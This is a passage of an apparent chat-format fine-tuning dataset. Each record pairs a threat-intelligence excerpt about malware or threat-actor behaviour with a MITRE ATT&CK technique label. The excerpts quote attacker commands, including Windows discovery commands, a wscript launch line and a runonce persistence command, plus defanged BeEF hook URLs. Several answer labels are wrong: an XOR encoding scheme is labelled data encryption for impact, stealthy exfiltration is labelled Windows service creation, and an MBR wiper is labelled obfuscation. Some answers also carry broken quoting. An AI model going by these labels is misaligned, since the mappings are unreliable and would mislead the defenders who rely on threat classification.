- "content": "The attachment itself is an Microsoft Excel XLS document that contains malicious macro script. The document presents itself as a standard macro document but has all of its text hidden until the victim enables macros. Notably, all of the content text is accessible to the victim even before macros are enabled. However, a white font color is applied to the text to make it appear that the victim must enable macros to access the content. Once the macro is enabled, the content is presented via the following code: ActiveSheet.Range(\"a1:c54\").Font.Color = vbBlack The code above changes the font color to black within the specified cell range and presents the content to the user. On initial inspection, the content appears to be the expected legitimate content, however, closer examination of the document shows several abnormal artifacts that would not exist in a legitimate document. Figure 2 below shows how the delivery document initially looks and the transformation the content undergoes as the macro runs"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN5, which earlier this year was profiled by researchers at Trend Micro and has been in action since at least 2008, uses real credentials from the victim organization's virtual private network, Remote Desktop Protocol, Citrix, or VNC. Vengerik says the attackers got those credentials via third parties associated with the victims' POS systems"
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts', 'T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts, sometimes coupled with social engineering tactics. In May 2016, we published a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware. The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SombRAT can execute \"getinfo\" to discover the current time on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PolyglotDuke can use \"LoadLibraryW\" and \"CreateProcess\" to load and execute code."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mythic supports custom chunk sizes used to upload/download files."
- },
- {
- "role": "assistant",
- "content": "T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once these variables are set, the malware uses the SoapHttpClientProtocol class to communicate with its C2 server, which issues an HTTP POST requests that appears as"
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has run \"net use\" to connect to network shares."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can open an interactive command-shell to perform command line functions on victim machines."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware will collect data from the victim machine and write this information to LOCALAPPDATA%\\MicroSoft Updatea\\uplog.tmp. The following information is collected from the victim"
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In 2018 Intezer covered Foudre version 8, which contained a certain sample labeled unknown binary that was not explored in Intezer’s research. In fact, this was a new component — called Tonnerre — which was a new step in the evolution of Infy, and contained various functionality absent from Foudre alone."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used code-signing certificates on its malware that are either forged due to weak keys or stolen."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "employs the same encoding scheme as for data it stages. Data is compressed with zlib, and bytes are rotated four times before being XOR'ed with 0x23."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WellMess can send files from the victim machine to C2."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "First, just like the Gh0st in the dshell paper from SANS, the decrypted protocol consists of a 5 byte header (ngLGX), a 4byte packet length field, and finally another 4 byte uncompressed length field. This is where the similarity ends as the Opcode and the data are compressed using ZLib, instead of just the data. Additionally, the entire packet is encrypted with an algorithm making visual analysis of the Wireshark data challenging. However, as the packet header is static, you can use the encrypted header as an identifier, like I did in my script. The encrypted header is: “\\xEA\\xEE\\xCC\\xD3\\xB8” and is unchanged throughout the malware’s runthrough"
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak has returned C2 data as encoded ASCII."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Janicab’s features also remind us of Powersing’s: the sample contains VM detection based on the MAC address of the machine, looks for malware analysis programs and has familiar antivirus software evasion routines. Janicab also periodically sends screenshot captures of the victim’s desktop to the C&C and appears to enable the execution of arbitrary Python scripts."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture', 'T1497 - Virtualization/Sandbox Evasion', 'T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SVR leveraged access gained from the SolarWinds campaign to compromise a certificate issued by Mimecast, which it then used to authenticate a subset of Mimecast's products with customer systems."
- },
- {
- "role": "assistant",
- "content": "T1199 - Trusted Relationship"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has delivered zero-day exploits and malware to victims via targeted emails containing a link to malicious content hosted on an uncommon Web server."
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ransomware payload is copied to an Active Directory Domain Controller and deployed to systems using the Default Domain Group Policy Object"
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DOMAIN} nltest /domain_trusts /all_trusts net share route print netstat -nao net localgroup qwinsta WMI Query ROOT\\CIMV2:Win32_BIOS WMI Query ROOT\\CIMV2:Win32_DiskDrive WMI Query ROOT\\CIMV2:Win32_PhysicalMemory WMI Query ROOT\\CIMV2:Win32_Product WMI Query ROOT\\CIMV2:Win32_PnPEntity - whoami /all - arp -a - ipconfig /all - net view /all - cmd /c set - - nltest /domain_trusts /all_trusts - net share - route print - netstat -nao - net localgroup - qwinsta - WMI Query ROOT\\CIMV2:Win32_BIOS - WMI Query ROOT\\CIMV2:Win32_DiskDrive - WMI Query ROOT\\CIMV2:Win32_PhysicalMemory - WMI Query ROOT\\CIMV2:Win32_Product - WMI Query ROOT\\CIMV2:Win32_PnPEntity"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Resulting script on the compromised government websites Users were redirected to https://google-updata[.]tk:443/hook.js, a BEeF instance, and https://windows-updata[.]tk:443/scanv1.8/i/?1, an empty ScanBox instance that answered a small piece of JavaScript code"
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port', 'T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A service that ensures Carbon’s persistency is created. Its name can either be “srservice”, “ipvpn” or “hkmsvc” depending of the operating system version running on the compromised machine"
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team's BCS-server tool uses base64 encoding and HTML tags for the communication traffic between the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DustySky searches for network drives and removable media and duplicates itself onto them."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remsec contains a keylogger component."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Evidence also supports the hypothesis that there is a encryption plugin for victim files (see below)"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hydraq creates a backdoor through which remote attackers can retrieve IP addresses of compromised machines."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "downloads and executes additional PowerShell code and Windows binaries."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can use Python to perform execution."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gold Dragon can download additional components from the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Another component used by this group is a variant of TerraTV. It runs a legitimate TeamViewer application but hides its user interface elements, so that the operators of the malware can connect to the compromised computer undetected"
- },
- {
- "role": "assistant",
- "content": "T1219 - Remote Access Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has used \"hidcon\" to run batch files in a hidden console window."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mosquito establishes persistence under the Registry key \"HKCU\\Software\\Run auto_update\"."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TRINITY malware used by identifies payment card track data on the victim and then copies it to a local file in a subdirectory of C:\\Windows\\. Once the malware collects the data, actors compressed data and moved it to another staging system before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BITTER has registered domains to stage payloads."
- },
- {
- "role": "assistant",
- "content": "T1608.001 - Upload Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Download a file from a remote server - Create a text file on the local machine - Execute a file - Execute a shell (cmd.exe) command and save the results to disk - Upload the results of a previously executed shell command to a remote server"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Orz can download files onto the victim."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kevin can assign hard-coded fallback domains for C2."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These appeared to be hosted on either Linode or Google Cloud, with a preference for using the ASN AS63949"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In addition, web traffic between a service provider’s customer and a service provider is likely to be viewed as benign by network defenders at the customer, allowing the attacker to exfiltrate data stealthily"
- },
- {
- "role": "assistant",
- "content": "T1543 - Create or Modify System Process', 'T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "queries the Registry to determine the correct Startup path to use for persistence."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be configured to use multiple network protocols to avoid network-based detection."
- },
- {
- "role": "assistant",
- "content": "T1026 - Multiband Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Torisma uses this method to send data back to the C2 server read from the named pipe. This is the results of the execution of the shellcode on the victim’s system through the ViewPrevPage action and the results of this execution are sent and processed using this function"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ChChes copies itself to an .exe file with a filename that is likely intended to imitate Norton Antivirus but has several letters reversed (e.g. notron.exe)."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 has transferred implant files using Windows Admin Shares."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lokibot has the ability to capture input on the compromised host via keylogging."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We were able to source a sample that may be the malware involved in the May 2018 attacks. We ran it, and it broke the boot sector as expected (see Figure 1). An initial analysis of the file revealed it was created using Nullsoft Scriptable Install System (NSIS), an open-source application used to create setup programs. The actor behind this threat used the application and purposely named it “MBR Killer. There are no indications of network-related behavior in this malware"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adds registry run keys to achieve persistence. In some cases, we observed using the following command:start cmd.exe /k runonce.exe /AlternateShellStartup"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix. In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol. APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it. Another backdoor used an otherwise legitimate DLL filename padded with a non-printing OS command control code"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information', 'T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DCSrv has created new services for persistence by modifying the Registry."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil has the capability to stop services and kill processes."
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Spalax, the threat actors relied on a victim to open a PDF document and click on an embedded malicious link to download malware."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The White Company has checked for specific antivirus products on the target’s computer, including Kaspersky, Quick Heal, AVG, BitDefender, Avira, Sophos, Avast!, and ESET."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has staged encrypted archives for exfiltration on Internet-facing servers that had previously been compromised with ."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed importing tools from GitHub or infected domains to victim networks. In some instances. Chinese statesponsored cyber actors used the Server Message Block (SMB) protocol to import tools into victim networks."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang has deobfuscated Base64-encoded shellcode strings prior to loading them."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StrifeWater can collect the OS version, architecture, and machine name to create a unique token for the infected host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) Use of zip file that contains a “.lnk” (Windows Shortcut) file. 2) Utilization of double extension trick (sample.doc.lnk) to convince users to open the file. 3) HTA (HTML Application) with VBScript embedded in the “.lnk” file 4) VBScript drops payloads and opens a decoy document or PDF to the user"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NOKKI can gather information on the victim IP address."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can be launched by using DLL search order hijacking in which the wrapper DLL is placed in the same folder as explorer.exe and loaded during startup into the Windows Explorer process instead of the legitimate library."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OopsIE uses the SmartAssembly obfuscator to pack an embedded .Net Framework assembly used for C2."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT19 used Regsvr32 to bypass application control techniques."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the victim is using PowerShell 3.0 or later, POWERSOURCE writes its decoded payload to an Alternate Data Stream (ADS) named kernel32.dll that is saved in \"%PROGRAMDATA%\\Windows\\\"."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can deobfuscate shellcode using a rolling XOR and decrypt metadata from Beacon sessions."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The maldocs used in this campaign typically contain a malicious VBA macro that downloads and activates the next stage of the infection chain. Although the VBA macro contains an auto open subroutine, it uses several VBA functions registered to trigger if the \"Typing replaces selection\" property is enabled in Microsoft Word. Appdata%\\desktop.iniThe next stage of the VBS is run using wscript.exe using a command such as:%windir%\\System32\\wscript.exe //e:vbscript //b <path_to_Stage_2>Macros dropping VBS to disk and running via wscript.exe"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When the persistence operation finishes, the loader deletes itself by writing a batch file in the Windows temporary folder with the file name prefix ‘tmp’ followed by random digits. The batch file content"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has used pass the hash for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
